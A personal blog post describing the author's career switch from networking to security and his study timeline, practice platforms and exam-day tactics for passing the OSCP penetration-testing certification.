Routing and switching to cybersecurity.
I started my IT career as a Network Engineer for almost 5 years. My career goal that time was to obtain a CCIE R&S certification(cisco networking) and nail some cloud certifications. Unfortunately, I was laid off from my company permanently sometime in 2018. My dream and interest on gaining the CCIE status become dark and blurry.
Jobless and in need of a job right away since I just proposed to my girlfriend 2 months prior to being kicked out (need cash for the wedding bro!). Cash flow should not stop. Time to hunt some networking roles!
Weeks and months passed by still no one called for job offers. Hopeless and cashless, I called my old manager from one of my previous employers. Unfortunately(that time :D), IT security role was offered to me since I have prior experience in firewalls and basic network security. I only have two options, reject the offer to pursue my CCIE journey or grab the cybersecurity role just to fill up my monetary needs and forget the CCIE thing.
Time was not my friend that time and cash was king. I took the role and forced myself to learn the basics of IT security.
The deeper the hate, the deeper the love.
During my first few months , we were baselining the company’s security posture. I was tasked that time to perform firewall rule audits and my other colleague who knew some basic pentesting stuff and eyeing on the OSCP path was responsible to perform nmap scans on all IT assets. Being a cyber fetus that time, I have no idea what is nmap and its usage. My colleague then showed me the results of his scans. I was amazed, astonished, fascinated and mind blown looking at the result. It is indeed a cool tool. I immediately switched persona from network guy to a pentester wanna be guy. I was also fortunate that I have a colleague which turns out to become my mentor on this journey.
Creating your own mental torture plan
Did you know that the 8th division boxing world champion Manny Pacquiao trains for 36 rounds when preparing for a scheduled fight? A boxing event only last for 12 rounds. We can say that a 12 round fight is just a mere practice for Manny. Another champion, the late black mamba -Kobe Bryant (RIP) once said in an interview “I never get bored with the basics”. Watching Kobe on his workouts was pretty boring. Everything was basic no flashy moves. He kept doing the same move for a couple of hours. For Kobe, the fundamentals of your craft is your core weapon to success.
Okay, enough of the cheesy story lines.
Here’s the timeline of events on how I prepared on my OSCP journey.
March 2019
I took the CEHv10 course which is shouldered by my employer. At this point, I am not 100% interested on the pentesting world. During this period, I killed most of my time trying to understand the basics of IT Security and how Governance, Compliance, Vulnerability Management, SOC Operations etc. are related to each other so 2019 was just an appetizer for my OSCP adventure.
To add more, I just did metasploit stuff throughout the year just to gain interest on hacking but not consistently.
Reference: https://information.rapid7.com/download-metasploitable-2017.html
January 2020
I read some articles on how to prepare for the OSCP exam and as suggested by my colleague. I ended up landing on abatchy oscp like vms. It was a disaster. I thought I learned so much during my CEH course and doing some metasploit attack. Eventually, I just read the writeups and absorb the content. I lost interest this time and felt that this is not my thing.
Reference: https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms
February 2020
I registered on hackthebox and tried some of the easy active boxes. Another disaster.
To regain my interest, I subscribed to tryhackme instead and promised my self that I will never visit hackthebox again lol. Tryhackme is a beginner friendly platform for cybersecurity enthusiast which was a good fit for me.
I initially took the beginner path room and later on progress to offensive pentesting room.
Reference: https://tryhackme.com/
March 2020 — September 2020
I am almost complete finishing the tryhackme offensive pentesting room ( I didn’t touch any of the buffer overflow boxes). Covid came and massive lockdown were implemented worldwide. I took this opportunity to subscribe to hackthebox since I will be having more time in front of my computer.
My mentore advised me to take a look at TJ null’s OSCP like boxes on hackthebox. It was a slow process for me to absorb the content on HTB. It took me a couple of months to feel comfortable playing with HTB machines.
Reference : https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8
https://www.hackthebox.eu/
October 2020
Seven months passed by, this point in time I finished 41 boxes out of the TJ null’s oscp like boxes on htb. I would say 20 of those boxes were only pawned by reading writeups. I usually got stuck on enumeration and new attack vectors. For me, It is okay to take a look at writeups. As long as you did your best in the enumeration phase. There are things or techniques that you are still not aware of. It is okay and it’s not a crime. ;)
Since buffer overflow was part of the exam this was the time I need to learn and acquire this skill. For this topic I watched CyberMentor’s buffer overflow tutorial on YouTube. Now I went back again on tryhackme offensive pentesting room to nail the buffer overflow boxes. I also checked out justinsteven’s buffer overflow tutorial on git hub and vortex buffer overflow guide.
After finishing the buffer overflow boxes on the 3rd week mark of October. I decided to take the 60 day course of OSCP.
References:
https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
https://github.com/justinsteven/dostackbufferoverflowgood
November 2020 — Dec 2020
Day 1 of my OSCP course, I find out that the PDF material is around 800+ pages long, I decided to skip reading the material and the exercises. On my perspective, the 60 day subscription is not enough finish all the materials plus the labs hence I went straight to to lab environment.
I was able to finish all the boxes on the lab. It took me roughly 40–45 days to finish everything.
Since nothing left for me , I read the PDF material decided to schedule my exam on the 14th of January. I did not pursue on creating a lab/exercise report. It was pure dirty labs.
Exam Preparation
My lab access ended on the 1st of January. If you will do the math, I have 13 days to prepare for the exam.
Day 1 to 4 [HTB] — I did easy-medium active HTB boxes. My plan was to own 1 box a day. Eventually I ended up rooting 5 active boxes.
Day 5 to 7 [THM] — I repeat some machines on tryhackme offensive pentesting room. As far as i remember I only did 3 boxes here.
Day 8 to 10 [BOF] — I went back to tryhackme and redo the bufferoverflow rooms. I also revisit justinsteven/vortex BO tutorials. It took me 2 days to finish everything here and used my remaining day to look for other platforms that can simulate a 24 hour mock exam.
I was struggling choosing between offsec proving grounds and h4cklife mock exam (vulnhub boxes).
Since my laptop doesn’t have enough disk space. I decided to subscribe on offsec proving grounds for my 24 hour mock exam.
Reference: https://h4cklife.org/posts/a-pre-exam-for-future-oscp-students/?fbclid=IwAR3QzV2ORA6tNGrM5zF-izwqB_xt7gwcj3hlyTs_gx-Y7bAhvBjrWstx0e8
https://www.offensive-security.com/labs/
Day 11 [REST] — I did nothing here except for creating a plan and choosing which 4 boxes on proving grounds I will take on my mock exam. Here’s the summary of the boxes I randomly selected.
Buffer Overflow — Brainpan on THM
Easy — Windows
Intermediate — Windows
Intermediate — Windows
Hard — Linux
Note: I intentionally selected 3 windows OS for both easy and intermediate boxes since hacking windows is a pain in the a**.
Day 12 [MOCK EXAM] — I was able to finish all boxes within 16 hours. It was cool and at this point I am confident that I will pass the exam.
Day 13 [MOCK EXAM REPORTING] — I decided not to do the report and take a rest instead.
EXAM DAY!
My exam was scheduled 5pm local time. My plan was to take the BOF-25–20–20–10 path or BOF-10–20–20–25 path(as plan B) and have the passing grade at the 12 hour mark.
For the BOF machine I was able to finish it approximately 1 hour and 30 minutes. Supposed to be I can finish it on a much lesser time since I wasted so much time on not running the immunity debugger and the application as an administrator. Application was not pausing and showing terminated bla bla status. I was really nervous and hopeless during these period so I suggest just relax and do not overthink when things are not working. Everything is going to be fine. Trust me. ;)
While doing the BOF machine I was running autorecon on both 25 pointer and 10 pointer machines. By just assessing the autorecon results and still having the hangover of the BOF machine disaster. The 25 pointer seems require more time to enumerate than the 10 pointer so I went to plan B path (BOF-10–20–20–25) instead.
Long story short, My 12 hour goal is really unrealistic from my skills and time management. I was able to finish BOF-10–20 within 10 hours but struggled on both 20 pointer and 25 pointer machine’s foothold. At the 12 hour mark, I was able to gain user shell on the 25 pointer. I decided then to skip the 20 pointer and kill all my remaining time on the privilege escalation of the hard machine just to play safe.
Now its 5 in the morning, I need to regenerate and unwind my head. I had a 4 hour sleep (which felt like just only 15 minutes) and woke up around 9 am.
Moving on to the 20 hour mark, There is still no progress on the privilege escalation however I had this public exploit that seems to be not working at all and I am about 80% sure that this is the right path.
With 4 hours left on my clock, I use the forbidden skill of OSCP — the metasploit bazooka. In just a couple of minutes, poof! I gained root privilege on the machine around the 22 hour mark. Having less time to pawn the 20 pointer, I use the remaining two hours on validating my screenshots on all boxes. Metasploit was definitely a life saver.
I finished the exam only with 80 points (BOF-10–20–25) leaving the 20 point box with just nmap scan alone XD.
Reference: https://github.com/Tib3rius/AutoRecon
Exam Report
I regret not doing the report on my mock exam simulation. Creating the report was not that easy if you are a first timer, you need to provide a step by step guide using the screenshots your gathered. Additionally you need to describe each step and validate your grammar. I also have an honest mistake here, I overslept after finishing the exam lol. I think I only have 6 hours to complete and submit the report. So my suggestion is practice creating a report prior to taking the exam so that you will have the hands on experience on how to create one.
My personal tip for beginners:
Assuming you have zero knowledge for OSCP. I suggest subscribe to Tryhackme first. Learn the basics here, from networking, linux, windows, nmap etc. everything you need is here. If you think you are good to go and managed to learn all the basics. Move up to the Offensive Pentesting Room
Next in line for you is HackTheBox, subscribe and pawn as much as you can using the TJ null’s OSCP like list. This is not beginner friendly, try to register your email account. Now tell me if it’s a beginner friendly platform. ;)
If you think you have the guts and skills to take the Exam. Do not enroll yet. try to pawn 3–4 active boxes on HTB. If you owned two or more active boxes without any help. I think you are all set to take the OSCP course.
Now It’s time to choose your poison, How many days should you take? On my current situation, I need to manage my time since I am a married man and have some responsibilities to fulfill at home.
Prior to taking the course, I had this goal that I need to own at least 1 box per day and end the course with at least 50 lab machines owned. For me, 60-day subscription is a perfect fit for me.
As mentioned earlier, I went straight to the labs on day 1. I really recommend this approach if you have a already a a solid understanding of hacking methodologies or already a seasoned pentester.
The 90 day subscription on the other hand can be an option too if you want to take the course as intended by OffSec.
My Golden Tip
Learning Phase:
- Try to be comfortable using manual tools, never use auto reconnaissance tools or metasploit during this stage.
- Google is your friend. Be crafty on your search keywords. Try to add shell, exploit, hack, pentest, hackthebox, htb etc. on it.
- Enumerate manually, stress all the ports/services/applications.
- Take notes. Jot down everything, take screenshots of your initial foothold, how you gained shell, privilege escalation, etc.
During the entire OSCP Course:
- Be goal oriented: I am talking about how many boxes you want to attain at the end of your lab time.
- On this stage you may use auto reconnaissance tools or metasploit on the lab machines so that you will be familiar on how to use these tools during the exam. I used autorecon for enumeration and winpeas/linpeas for privilege escalation attack vectors. These tools will save you a lot of time during the 24 hour exam.
- Again, take notes. Aside from documenting your attack vectors. The lab environment was designed to be an actual corporate network. Some machines contain information that can be used to access other machines, applications, etc.
- Read and watch the materials. You paid for it. Use it.
Reference:
https://github.com/Tib3rius/AutoRecon
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
Exam Day:
- Make sure you had a nice and decent sleep the day before your exam.
- Make sure you have a backup of your attack box. What if your kali crashes during the exam?
- Food and refreshment should be available at all times. Eat and drink. Don’t die.
- Start with BufferOverflow. Run autorecon on 4 boxes while doing the BO.
- Skip boxes if nothing seems to be working for 2 hours.
- Take notes and screenshots.
- Once finished on a certain box, revisit your notes. Read it again. Validate if you missed something.
- Sleep. Stop enumerating. 4–5 hours is enough.
- Metasploit can save you.
- Creating the report is very easy as long as you have a good amount of time and had gathered the essential screenshots and notes for each box.
That’s all for me. I am sorry for the dramatics and long post but anyway you managed to read this so I think you enjoyed every part of it. :)
-bigoteman